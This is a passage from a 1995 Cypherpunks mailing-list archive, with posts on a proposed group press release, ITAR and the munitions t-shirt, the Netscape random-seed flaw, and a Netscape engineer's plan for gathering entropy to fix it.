putative "Cypherpunks logo." Sorry I did not insert smileys. The problem with the "Cypherpunks press release" notion is this: -- we are an effective anarchy. -- there is no "spokespunk" and no foreseeable way of choosing one. Some people seem to _want_ some kind of central contact organization or point, some place to lobby, buy advertising, send faxes, give press conferences, etc. But I don't see it happening. Individuals and their organizations are free of course to do as they wish, but if they claim to speak for "the Cypherpunks," they'll be out of line. We are not a direct democracy, nor even are we a representative democracy. No board of directors, etc. While this undeniably affects how "messages" get out, that's life. There are plenty of organizations with Washington offices, and with spokesmen available for comment. But they don't have what we have. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From fair at clock.org Wed Sep 20 10:51:33 1995 From: fair at clock.org (Erik E. Fair (Time Keeper)) Date: Wed, 20 Sep 95 10:51:33 PDT Subject: RSA Prevails In Arbitration Against Cylink Message-ID: Is there electronic copy of the Arbitration Panel's precise ruling available? No quicker way to end the PR confusion than to read the Real Thing(tm). Erik From joelm at eskimo.com Wed Sep 20 11:04:34 1995 From: joelm at eskimo.com (Joel McNamara) Date: Wed, 20 Sep 95 11:04:34 PDT Subject: Announce: Private Idaho beta release Message-ID: <199509201802.LAA10836@mail.eskimo.com> I've finally gotten some time to incorporate a few new features/bug fixes into Private Idaho (Windows remailer/PGP front-end). The 2.5b4 release now incorporates an easy interface to the alpha.c2.org nym server. Also, simple scripting is available for moving messages to e-mail apps that don't support sequential header tabbing (Free Agent, Netscape, etc.). The next available block of time will likely be devoted to incorporating background POP3 scanning and downloading of PGP messages. http://www.eskimo.com/~joelm - for your downloading please... Joel McNamara joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP Thomas Jefferson used strong crypto, shouldn't you? From frissell at panix.com Wed Sep 20 11:12:55 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 20 Sep 95 11:12:55 PDT Subject: Cypherpunks Hold a Cracking Party Message-ID: <199509201812.OAA28709@panix.com> At 11:28 AM 9/19/95 -0400, Duncan Frissell wrote: >Just to let everyone know that I've got an assignment from Wired to do a >story with the above working title. > As it turns out, Steven Levy and I had an assignment collision at Wired and were both assigned the story. For some unknown reason, they wanted him to do it instead of me so I will *not* be doing it. Steve -- feel free to use my title if you like. DCF "Anyone know any publications interested in an article on the Crack?" From klp at gold.tc.umn.edu Wed Sep 20 11:16:30 1995 From: klp at gold.tc.umn.edu (Kevin L Prigge) Date: Wed, 20 Sep 95 11:16:30 PDT Subject: Cypherpunks Press release In-Reply-To: Message-ID: <30605a7539c7002@noc.cis.umn.edu> A little birdie told me that Dietrich J. Kappe said: > > -----BEGIN PGP SIGNED MESSAGE----- > > We've seen the word "hacker" kicked around rather arbitrarily in the press. > Are we to conclude that the cypherpunks are a bunch of hackers? I think its > time for some cypherpunks spin. How about a logo *and* a press release? The > press release would give contacts (email, phone, etc.) so that someone on > this list would be contacted by journalists when a crypto story breaks. > I think that a press release would be hard, based on the fact that there is no central organization here on the cypherpunks list. I know that in times past, Eric Hughes has been quoted in the press, as well as Tim, and perhaps others (forgive my lack of memory), but there is no approved spokesperson because there is no organization. > If we get enough volunteers, we can fax blanket every newspaper, station, > and network in the world. Does anyone know exactly how the press contact thing works? My impression is that a reporter/journalist stumbles on to someone who knows something about a particular area, and is willing to be interviewed. Then the next time a story comes along that deals even slightly with that subject, the reporter will tend to contact that person. -- Kevin Prigge | Holes in whats left of my reason, CIS Consultant | holes in the knees of my blues, Computer & Information Services | odds against me been increasin' email: klp at cis.umn.edu | but I'll pull through... From tcmay at got.net Wed Sep 20 11:17:18 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 20 Sep 95 11:17:18 PDT Subject: Munitions shirt (again) Message-ID: At 3:49 PM 9/20/95, Ian Goldberg wrote: >So, Dave and I got free munitions shirts (they're different, though; >the font is smaller and they have a bunch of X'd out Constitutional >Amendments on the back; I think they ere designed by Joel Furr) for >our bug find. > >So I'm wearing it today. The thing is, I live in International House, >a residence that has 50% non-Americans. > >So, any consensus as to whether it's actually illegal to do so? I >remember some disagreement a few weeks ago that AFAIK wasn't resolved. The _consensus_ here seems to be: "This t-shirt is illegal to wear in front of non-Americans," judging by the comments here. The _reality_ is quite different, I think, and the "this shirt is illegal" hype is, in my opinion, just that, hyperbole. Even hyperbull, too. Books and written articles containing crypto algorithms are _not_ illegal for "furriners" to look at. The t-shirt contains at most a fuzzy printing of an algorithm that has been widely printed in various books and in articles in mailing lists like ours. (I agree that there are some unresolved issues with ostensibly machine-readable forms. The t-shirt is not machine-readable by any plausible interpretation of machine-readable.) >As far as I can tell, it's _technically_ illegal, but any LEO would be >out of his mind to try to enforce it (it would have to be a Fed, too, >wouldn't it? Or can regular city cops get you for violating export >restrictions?). Ian did great work on the latest Netscape break, but this is just plain crazy. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From vznuri at netcom.com Wed Sep 20 11:58:55 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 20 Sep 95 11:58:55 PDT Subject: netscape bug Message-ID: <199509201855.LAA17261@netcom16.netcom.com> clearly the netscape engineers did not practice "safe crypto programming", but I question the seriousness of the crack. none of the articles mention that the cracker must have login access to the computer that the random numbers are generated on. is this true? does the code require knowledge of the PID etc. that can only be obtained by a login to the system that the netscape session is running on? if this is true (i.e. login access required) this bug is by far not as serious as some of the hyperbole is suggesting. I agree it is still very insecure but the most dangerous crypto bugs are those where you can determine keys from data alone.. physical penetration into a machine is another level of security.. furthermore, I would like to commend Netscape for their fast response to the problem and apparent commitment to establishing safeguards that avoid it in the future. cypherpunks have an easy time ridiculing someone who slit their throat on writing some crypto functions, but geez, cut them some slack: crypto stuff has so many pitfalls and bugaboos that even the world-class experts make mistakes. where else can not properly "burning" stack registers (function parameters) and environment variables be considered "lethal"??? PGP errors have been reported on numerous occasions, some in the randomizer code. do people call for Zimmermann's head on a stick and call him "incompetent"? often when cryptographers say something is "broken" it can still mean that it is not necessarily unsafe in practice. there are many shades of "broken", some requiring a Cray and other's requiring a PC. I am really surprised how much people here consider "broken is broken". this is only the extreme theoretical perspective. granted I am not advocating that people *not*fix* bad crypto functions, I'm only saying that maybe its not in everyone's best interest to run around and say "the sky is falling" and lambaste companies for minor difficulties.. Netscape is a world class product, and it's *free*. on this cypherpunks list, I have seen no end to the venemous criticisms that people level at *free* products, which IMHO is quite tasteless at times. Netscape has done far more for the cypherpunk cause than many, many companies just by including RC4 in their product. they have taken some heat for their decisions & code, but they are on the front lines of battle. now instead of our vague claims about how the world can benefit from good crypto, how it is immensely valuable and important to cyberspatial financial transactions, to promote the cypherpunk cause, we now have something *popular*, *physical*, and *tangible* to point to: netscape!! this is *not* vaporware. this is not some cpunk saying, "all one needs is [x] algorithm running on [y] network and you have a world class infrastructure". the amount of work to get something like Netscape into the world is quite daunting and herculean. we owe a great debt to netscape and their accomplishments for furthering our own agenda!!! please do not trivialize what they have accomplished!! Netscape is here, it works, and it is cyberspatial crypto that Joe Sixpack can understand and *use*!! it is not a toy remailer, it is not some PGP front end, it is not some mailer script, *this* is the format in which Joe Sixpack will be using crypto in the future, the format which will bring "crypto to the unwashed masses"!! Netscape may very well be the chief vehicle that puts on *concrete pressure* on our government to relax crypto export laws. I see this happening *right now* with them going to a 64 bit key from a 40 bit one, and the world starting to realize the importance of crypto and the idiocy of the export laws. I am really amazed at how few seem to be supporting Netscape here and considering them the *premiere ally* in our current battle. it reminds me of how much people here rant at Microsoft when virtually no other company on the planet could pull off what they make look easy (ah, that's another story I've filled up other posts with). please do *not* take an adversarial relationship with the companies who are helping advance the cutting edge of cyberspace!! do *not* ridicule them. rather, help them to understand their problems. I think you will find that most companies are *not* hostile to improving their software, and will readily admit it when it needs fixing (intel has been humbled by their pentium glitch, and I doubt any company again will ever be so obstinate and belligerent..) . I am willing to bet that the netscape bug would have been fixed quickly if it had been quietly brought to their attention, without the blaring media lights (I enjoy the media circus as much as the next guy, but on the other hand, doing some things quietly may actually advance the cypherpunk cause further than by making a noisy hullaballoo in cyberspace). once again I commend Netscape for their fine software and willingness to perfect it. netscape is at the cutting edge of advancing key cyberspace technologies and it is not surprising that they make some minor mistakes with the code in these early phases. cyberspace is very young!! give designers a bit of time to get it right. be patient!! do not accuse them of incompetence!! netscape is tens of thousands of lines of world-class code. only in programming can a few moments of total, rapt attention lead to bugs that get blared on the front page of new york times and affect your stock price!! good lord, give the guys a break. cpunks: when Netscape has some serious competitors, they will get their act together. but at the moment they are the only game in town, and it will pay off to be nice to them, and try to support them, instead of kicking them in the teeth and wringing them every time they make a mistake. few in the world are as knowledgeable or paranoid as we are about security, and its going to be a gradual process to get to even a fraction of the expertise here penetrating the mainstream software industry. be patient!! -- P.M. notes that anywhere there is a data-driven buffer overflow (which he suspects are all over netscape) he can get code to execute anything he wants. this reminds me of the Morris internet worm that ran exactly the same way. it used a bug in the finger demon that caused a string buffer overwrite (via strcpy, instead of strncpy) to execute customized code. my question: I have not seen the specifics of how this works. does this require specialized knowledge of the native machine language on the host machine? or is it just used to cause something like a core dump to get a command line or something like that? --Vlad Nuri From kelli at zeus.towson.edu Wed Sep 20 12:00:43 1995 From: kelli at zeus.towson.edu (K. M. Ellis) Date: Wed, 20 Sep 95 12:00:43 PDT Subject: Cypherpunks Press release In-Reply-To: Message-ID: On Wed, 20 Sep 1995, Dietrich J. Kappe wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > We've seen the word "hacker" kicked around rather arbitrarily in the press. > Are we to conclude that the cypherpunks are a bunch of hackers? I think its > time for some cypherpunks spin. How about a logo *and* a press release? The > press release would give contacts (email, phone, etc.) so that someone on > this list would be contacted by journalists when a crypto story breaks. > > If we get enough volunteers, we can fax blanket every newspaper, station, > and network in the world. > > > I've got a pretty effective list of fax numbers...everything from the fox network to CBS' Eye on America show. Anyone can contact me if you need 'em.. I'm sure we could put them to good use. -=Kathleen M. Ellis=- kelli at zeus.towson.edu Geek Code v3.0 http://zeus.towson.edu/~kelli/ GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-) PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z** Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu "All the world will be your enemy, Prince With The Thousand Enemies. . . And whenever they catch you, they will kill you. But first, they must catch you. . ." -Richard Adams From Andrew.Spring at ping.be Wed Sep 20 12:08:47 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Wed, 20 Sep 95 12:08:47 PDT Subject: MD5 in Eudora Message-ID: I was just poking around in Eudora for the Mac with ResEdit, and I found a CODE resource labelled MD5. Any idea why Eudora is using MD5 hashes? From sdw at lig.net Wed Sep 20 12:23:51 1995 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 20 Sep 95 12:23:51 PDT Subject: Cypherpunks Press release In-Reply-To: Message-ID: > > -----BEGIN PGP SIGNED MESSAGE----- > > We've seen the word "hacker" kicked around rather arbitrarily in the press. > Are we to conclude that the cypherpunks are a bunch of hackers? I think its > time for some cypherpunks spin. How about a logo *and* a press release? The > press release would give contacts (email, phone, etc.) so that someone on > this list would be contacted by journalists when a crypto story breaks. > > If we get enough volunteers, we can fax blanket every newspaper, station, > and network in the world. > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQBgAwUBMGBA2XIf3YegbdiBAQG0RQJXdWG0beFoFEk6BfEkhIDYxB6NsbSSIGWe > Nzob7W7Gd/YyRqsVhU5T8jQEpD6sNLwTP+4SypSC9Mk8EauKAvklHkkfGr53scQh > 5Tzp > =Fxdn > -----END PGP SIGNATURE----- > > Dietrich Kappe | Red Planet http://www.redweb.com > Red Planet, LLC| "Chess Space" | "MS Access Products" | PGP Public Key > 1-800-RED 0 WEB| /chess | /cobre | /goedel/key.txt > Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84 ( hate to suggest this, but someone has to throw the idea out.) We could always threaten to sue for defamation... (You can fill in any one of a number of differences between the canonical cypherpunk vs. hacker/cracker.) Specify the clarification has to include logo. sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From conrad at unix-ag.uni-kl.de Wed Sep 20 12:24:53 1995 From: conrad at unix-ag.uni-kl.de (Peter Conrad) Date: Wed, 20 Sep 95 12:24:53 PDT Subject: Linking = Showing = Transferring? In-Reply-To: <10345.9509151143@exe.dcs.exeter.ac.uk> Message-ID: <9509201922.AA11324@pizza.unix-ag.uni-kl.de> -----BEGIN PGP SIGNED MESSAGE----- Hi, > Browser in the US, text in US, crypto gif imported from UK, both legal. > > Browser outside US, text in US, crypto gif imported from UK, both legal. > > See a flaw in that? Not directly, but... what if for some strange reason the image is routed through US gateways on its way from the UK to, for example, Germany? I mean, The Net (tm) is a strange beast, and you can rarely tell which way the message flows... you can't even DO anything about it. Bye, Peter - -- Peter Conrad | "Those people who tell you not to take chances, they are all Am Heckenberg 1 | missing on what life's about, you only live once, so take 56727 Mayen | hold of the chance, don't end up like others the same song Germany | and dance!" - Metallica, 'Motorbreath' Email: p_conrad at informatik.uni-kl.de,conrad at unix-ag.uni-kl.de -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAgUBMGBpBbFFskV8RCVHAQGyEwQA2QD4FdrHzKAiiiA/MneC66SU8SBo5neS 3kErDNJZQ1vK5qSR7XuSQSJY/svW3F6YozmgG7YD8RcYwoY8O3OjSaEaOmrRqpIi qftdceLmf5o9O1NktXBLEPTw/qm4IOVwTD4l2P+zsbwvuZpHYt8hBg3bLZm2Xtvy 1OzPp95OzTE= =HqWo -----END PGP SIGNATURE----- From kelli at zeus.towson.edu Wed Sep 20 12:28:51 1995 From: kelli at zeus.towson.edu (K. M. Ellis) Date: Wed, 20 Sep 95 12:28:51 PDT Subject: My new perspective on ITAR (was Re: Munitions shirt (again) In-Reply-To: <199509201549.IAA19844@cuzco.CS.Berkeley.EDU> Message-ID: On Wed, 20 Sep 1995, Ian Goldberg wrote: > So, Dave and I got free munitions shirts (they're different, though; > the font is smaller and they have a bunch of X'd out Constitutional > Amendments on the back; I think they ere designed by Joel Furr) for > our bug find. Good. > > So I'm wearing it today. The thing is, I live in International House, > a residence that has 50% non-Americans. > > So, any consensus as to whether it's actually illegal to do so? I > remember some disagreement a few weeks ago that AFAIK wasn't resolved. > > As far as I can tell, it's _technically_ illegal, but any LEO would be > out of his mind to try to enforce it (it would have to be a Fed, too, > wouldn't it? Or can regular city cops get you for violating export > restrictions?). > > - Ian > Funny, this thread sounds awfully familiar. In fact, I think I wrote almost this _exact same post_ about 3 weeks ago, just substituting "Berkeley" for "Towson State University". I mentioned the fact that I live in the International House of _my_ campus, and we discussed the legality of my wearing it. We hashed over it for a few days, and never really came to a real answer, since ITAR is rather vague in that area. I might add, however, that two days ago I wore my RSA shirt to my sound design class, where the guy I happened to sit down next to recognized it, was familiar with what it stood for, and knew all about the Zimmerman case; not because he was a crypto enthusiast or a comp sci major, but because he works for customs at Baltimore-Washington International Airport. This event really changed my point of view considering ITAR... I figured that it was just one of those dumb laws that _nobody_ really paid much attention to except for the FBI and that was only because they were looking for a way to nail Zimmerman for writing good crypto. I had assumed that ITAR was something that customs agents/L. E. O's/etc. learned about, took a test on it, then forgot about it the next day. Interesting... they _really_ are serious, aren't they? -=me=- kelli at zeus.towson.edu Geek Code v3.0 http://zeus.towson.edu/~kelli/ GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-) PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z** Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu "All the world will be your enemy, Prince With The Thousand Enemies. . . And whenever they catch you, they will kill you. But first, they must catch you. . ." -Richard Adams From vznuri at netcom.com Wed Sep 20 12:31:48 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 20 Sep 95 12:31:48 PDT Subject: cypherpunks press releases/contact list: YES!! DO IT!! Message-ID: <199509201928.MAA20230@netcom16.netcom.com> I'm going to argue against TCM and others who are opposed to a "cypherpunk press release" because this is not an "organized group". a press release mechanism is one way by which the organization of this group can be increased. and I'm going to say something heretical in cypherpunk circles, but imho, ORGANIZATION == POWER. this is a basic rule of life that all the rabid libertarians and cryptoanarchist loners here hate to admit, but it's really true and inescapable. anyone who wants to issue press releases for the "cypherpunks", I say, GO FOR IT. don't let someone discourage this because this is an "anarchy". that's actually an excellent reason for you to JUST DO IT!! some will be willing to have their names on the list, and they will email you. others will flame you and not want their name included. simply ignore the later category!! the cypherpunk logo is not copyrighted. no one has any say on who or what a "cypherpunk" is. so, let someone pick a reality and let it prosper or wilt by assent and "voting with the feet". just be careful not to misrepresent anyone. start a list, just like anyone can start a FAQ. a list of names to contact and their specialties would be *excellent* for this purpose. occasional press reports on what is happening on list traffic would be very useful, too. look, there are some very tangible and definite ways to advance the cypherpunk agenda. there are many here who like to play in the dark and shadows and not make any noise. that's fine!! but don't expect everyone to share your disinterest in publicity or organization. if this is in fact an anarchy, why are you discouraging anyone from pursing that which interests them?? IMHO playing in the dark, not trying to appeal to the widespread masses through the media and everything else at hand, is just the NSA's way of trying to manupulate reality through "back door" approaches. I again suggest that a simple list of poeople here who are willing to talk to the press, organized under their expertise/speciality, is an *excellent* idea that is an idea whose time has come. this is such a great idea that *I* may do it if nobody does it after a week or two. --Vlad Nuri From alano at teleport.com Wed Sep 20 12:33:26 1995 From: alano at teleport.com (Alan Olsen) Date: Wed, 20 Sep 95 12:33:26 PDT Subject: Netscape sub rosa? Message-ID: <199509201933.MAA19342@desiree.teleport.com> At 12:30 AM 9/20/95 -0700, you wrote: > >Gee, where's that "Cypherpunks logo" when you really need it? > >A rose covering the Netscape "N" logo? A crypto eagle swooping down and >pecking at weak keys? > >Netscape sub rosa? Or a big burning Netscape logo? Or an NSA agent licking the hot end of an electrical power cord for a Cray? Or a picture of a lock with a big bullet hole through it? Oh no! Not the "Logo Wars(tm)" again! | Visualize whirled keys | alano at teleport.com | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - Black Art | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From hallam at w3.org Wed Sep 20 12:37:53 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 20 Sep 95 12:37:53 PDT Subject: Please send me SSL problems... In-Reply-To: Message-ID: <9509201937.AA00765@zorch.w3.org> >Jeff, the SSL specification has a severe *architectural* problem - it >assumes that Internet Protocols are APIs - interface standards, and that >you can just slide a "layer" underneath without anyone noticing. Such is >not the case - all the Internet Protocols are real protocol standards, in >that they specify the syntax, order, and semantics of the actual bits on >the wire. The IETF quite explicitly doesn't care about APIs - that's a host >software issue, and it doesn't matter what the host software looks like (or >even what the machine looks like), so long as it gets the bits on the wire >right, according to the protocol spec. This is how the Internet can make >very strong guarantees about interoperability. I agree with parts of this and disagree with other parts. The IETF does not as a whole care about APIs. The one exception being the GSS API which appears to be intended as a means of cicumventing ITAR. Nobody asked me about GSS API but a lot of people have assumed that because it comes from the IETF it should be the basis for the Web security protocols. I'm affraid that I can't see any real connection between the GSS view of the world and my own. Hence I find that API more of a hinderance (having to explain why not to use it) rather than a help. The specific criticism of SSL, that it is layer replacement highlights a fundamental error made by many IETF people. The purpose of a layered protocol model is precisely to permit the underlying layers to be altered without affecting the upper layers. NNTP runs very happily on either TCP/IP or on DECnet for example. Where I think SSL went wrong was in the approach taken to URLs. Rather than define HTTPS://foo.com/ it should specify a new transport HTTP://foo.com:80:SSL/ I think the blame for that mess should be laid at another door however. Basically the URI working group should have understood this issue and defined a syntax for handling both SSL like objects and also DECNET, ATM. This would fit much better with the idea of SSL as being a wrapper for an arbitrary protocol. I think its worth pointing out that the people working at Netscape now are a rather different bunch to the original team. Phill From liberty at gate.net Wed Sep 20 12:49:09 1995 From: liberty at gate.net (Jim Ray) Date: Wed, 20 Sep 95 12:49:09 PDT Subject: Munitions shirt (again) Message-ID: <199509201945.PAA54022@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Ian Goldberg wrote: >>So, any consensus as to whether it's actually illegal to do so? I >>remember some disagreement a few weeks ago that AFAIK wasn't resolved. And Tim replied: >The _consensus_ here seems to be: "This t-shirt is illegal to wear in front >of non-Americans," judging by the comments here. And since _I_ started all this trouble with a private e-mail to Futplex; I'll now jump in saying again, [IANAL]: "This t-shirt may or may not be illegal to wear in front of non-Americans," from my reading a while back of the dense text of this silly law, [I'll spare all of you a quote of it, but there's text that MIGHT be interpreted that way.] >The _reality_ is quite different, I think, and the "this shirt is illegal" >hype is, in my opinion, just that, hyperbole. I agree with Tim that actual enforcement of this silly a law is unlikely, especially in Ian's case right now, and *especially* during our US (election) "silly season," for obvious reasons. The availability of strong encryption is unlikely to be a major issue during this election cycle, despite Cypherpunk efforts, and enforcement of this dumb law would be a "gift" to those of us who think it should be. [I hope I'm wrong here, but I think you're safe, Ian.:)] >Even hyperbull, too. I wouldn't go *that* far, though. Poorly written, ambiguous, statist laws can be interpreted in any number of ways and for a variety of reasons having little (or nothing) to do with justice. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMGBvrW1lp8bpvW01AQFj1AP8C1RKpayv6V15sTBLiFLWV4tlfWRUuLfm JVWgeUeHUFxBV1EttbGv30iTmwlCJmBab/wLUag9S57DLZ6Ajed7jQe0rpra56Nl OgmM1gGU8nJJazYeqiWbYrOc/VSheSqQVLAj+vOoufW8XnU1iFkXQnRziCcyO2Nc bto4hKBrFWY= =qlSx -----END PGP SIGNATURE----- Regards, Jim Ray "Not everything that is faced can be changed, but nothing can be changed until it is faced." -- James Baldwin ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James Milton Ray ----------------------------------------------------------------------- Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf _______________________________________________________________________ From m5 at dev.tivoli.com Wed Sep 20 12:57:37 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 20 Sep 95 12:57:37 PDT Subject: A message from Joe Six-Pack Message-ID: <9509201957.AA10522@alpha> Well, the original sender of this is actually anything but "Joe Six-Pack"; his taste in beer is well-developed, and he's no moron. This is, however, an interesting take on the Netscape thing from a non-cypherpunk. He came across the Community ConneXion press release and responded: ------- start of forwarded message (RFC 934 encapsulation) ------- From: XXXXX Subject: Re: Fwd: HackNetscape promotion (fwd) >For Immediate Release >Contact: sameer at c2.org 510-601-9777 > >COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS > >Sept 19 1995 - Community ConneXion ... Am I the only one who finds this silly? All this fuss about credit card encryption is such BS. My totally unencrypted credit card number is in the hands of brain-dead minimum-wage waitrons and green-haired retail clerks dozens of times a week with no encryption. Gas station attendants, restaurant clerks, supermarkets and banks have the number, and an unscrupulous type could use it and hose me at any time. I've had credit cards for 15 years and nothing like that has ever happened. If it does, I'm out $50 and a bunch of pain in the butt phone calls. So the thought of some geek with a LAN sniffer and too much time on his hands sucking simply encrypted numbers off the internet does not exactly make my heart go pitter-pat. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From perry at piermont.com Wed Sep 20 13:04:05 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 13:04:05 PDT Subject: netscape bug In-Reply-To: <199509201855.LAA17261@netcom16.netcom.com> Message-ID: <199509202002.QAA05425@frankenstein.piermont.com> "Vladimir Z. Nuri" writes: > none of the articles mention that the cracker must have login access > to the computer that the random numbers are generated on. is this true? > does the code require knowledge of the PID etc. that can only be obtained > by a login to the system that the netscape session is running on? You can guess the PID without much trouble -- they are 15 bit numbers. > P.M. notes that anywhere there is a data-driven buffer overflow (which > he suspects are all over netscape) he can get code to execute anything > he wants. this reminds me of the > Morris internet worm that ran exactly the same way. That was one of the first wide exploits of the trick, yes. > my question: I have not seen the specifics of how this works. does > this require specialized knowledge of the native machine language on the > host machine? Yes. However, its very straightforward to do. The recent syslog(3) problem was of this nature, by the way. Perry From alano at teleport.com Wed Sep 20 13:08:42 1995 From: alano at teleport.com (Alan Olsen) Date: Wed, 20 Sep 95 13:08:42 PDT Subject: Linking = Showing = Transferring? Message-ID: <199509202008.NAA29083@desiree.teleport.com> At 09:18 PM 9/20/95 +0200, you wrote: >> Browser in the US, text in US, crypto gif imported from UK, both legal. >> >> Browser outside US, text in US, crypto gif imported from UK, both legal. >> >> See a flaw in that? > >Not directly, but... what if for some strange reason the image is routed >through US gateways on its way from the UK to, for example, Germany? >I mean, The Net (tm) is a strange beast, and you can rarely tell which way >the message flows... you can't even DO anything about it. It can get pretty weird. A friend did a traceroute on a site across town. It was relayed half-way across the world to get there. (Through Poland or some such absurdity.) It seems that no matter what you do, you are breaking the law... | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From karlton at netscape.com Wed Sep 20 13:15:25 1995 From: karlton at netscape.com (Phil Karlton) Date: Wed, 20 Sep 95 13:15:25 PDT Subject: "random" number seeds vs. Netscape Message-ID: <43psn2$6ug@tera.mcom.com> Let me start off by saying that I speak for me and not Netscape. I also tend to be UNIX centric since I know very little (nothing?) about the internals of PCs and Macs. I want to address the bug Netscape has with its currently released product with respect to seed generation. For the most part this is not a crypto issue, but rather a system issue. Those bits of entropy can only be gathered in a system dependent manner. Assumption: We are relying on the MD5 hash algorithm to gather the string of potentially unpredictable sequences. I am assuming that feeding known bits along with the unknown will not compromise the "randomness" of the MD5 state. The basic idea is to feed a sequence of information into the MD5 hash, expecting that some of the bits for each sub-sequence would be only be guessable. If we get enough unguessable bits into the mix, then the weak link in the chain would not be the seed generation. Here is what the client will soon be doing: Netscape is available on Macs, Win-16 and Win-32 versions and 8 different UNIX platforms. The exact details for each platform are quite system specific. The basic idea is to feed a sequence of information into the MD5 hash, expecting that some of the bits for each sub-sequence would be unguessable. At program start On all platforms: Start with the contents of the highest resolution clock we can find on the system. [For instance, an R4000 MIPS processor has a free-running instruction counter. At 100 Mhz this gets incremented every 10 nano-seconds. There are probably a good 20 bits of unguessable value there.] On Macs and Win* systems there are "tick" counters that update 60 (or maybe only 16) times a second. We then push through the time of day, beacause on some sytems, the microsecond part of a time_val has some bits that are only guessable. For UNIX we feed the following into the MD5 hash: ps (-el or aux depending upon system) netstat -ni & netstat -na the user's environment. (We will certainly use this as well in the 2.0 release. The truly paranoid will be able to run whatever seed generator they want and stick the result into their environment. How you protect your environment from attack is up to you. ;-) System specific info such as hardware serial number or system id. If you have specific suggestions for any particular OS/hardware pair, please let me know. For PCs Cursor position Global memory status FreeSpace Drive configuration Number of running tasks Environment strings UUIDCreate if there is an ethernet card Clipboard owner and contents Current process, processID and window Free clusters on the disk For MACs: Machine location (longitude and latitude) User name Mouse location keyboard time threshhold last key pressed audio volume current directory current process process information for every task on the system stack limits zones scrap sizes and counts event queue And then on all platforms The stat (file access, creation, modify times, size, inode equivalent) and contents of a number of "interesting" files. [Where is the PGP random number state file stored?] A portion of the contents of the screen. And finally, the contents of the highest resolution clock we can find. Each time the client goes idle Reinitialize the seed with the most recent user event (probably a button or key down) along with the mouse position, and and relatively high resolution clocks. Known weaknesses: If your X display is not the local machine then the X protocol can be watched. Given that, the data for the reseeding of the MD5 hash will be compromised. [Any scheme that relies on random user input to generate a seed suffers from the same problem.] This is not quite as bad as it might be. The exact time of the client becoming idle can only be guessed. We should be able to get a few unguessable bits from the microsecond part of the time-of-day clock each time. Enough cycles of user actions should help to make the hash less subject to a brute force attack. In fact, the entire X protocol issue is one that could take up another 3 pages. An SSLized version of the server would help, but how would anybody export it? You "xhost +" fans are doomed. If the user launches the client to a secure home page then there will be no user actions involved before the first need for a seed. Thoughts on guessing: If Eve has root access to the user's workstation, all bets are off. Replacement of one of the system libraries or patching the client executable are among the attacks that would make it trivial to breach any part of the security. Specific measures (like computing a hash over the text of the program) could help against some of these attacks, but it is not realisitic to believe that we can prevent the attack from a sophisticated person with root access. Multi-user Unix machines present a special problem. There are those at Netscape that argue that anybody who has login access to your machine may as well be considered to have root access. There are enough known attacks that this is true to a large extent. However, I think we can do better than just giving up. Unfortunately most of the sources of entropy available to the client are also available to the attacker. For instance, the output of "ps" is not much help against this form of attacker. As Jeff Weinstein said earlier and I echo here: specific suggestions are more than welcome. When Eve has access to the wire for all of the packets into and out of the user's 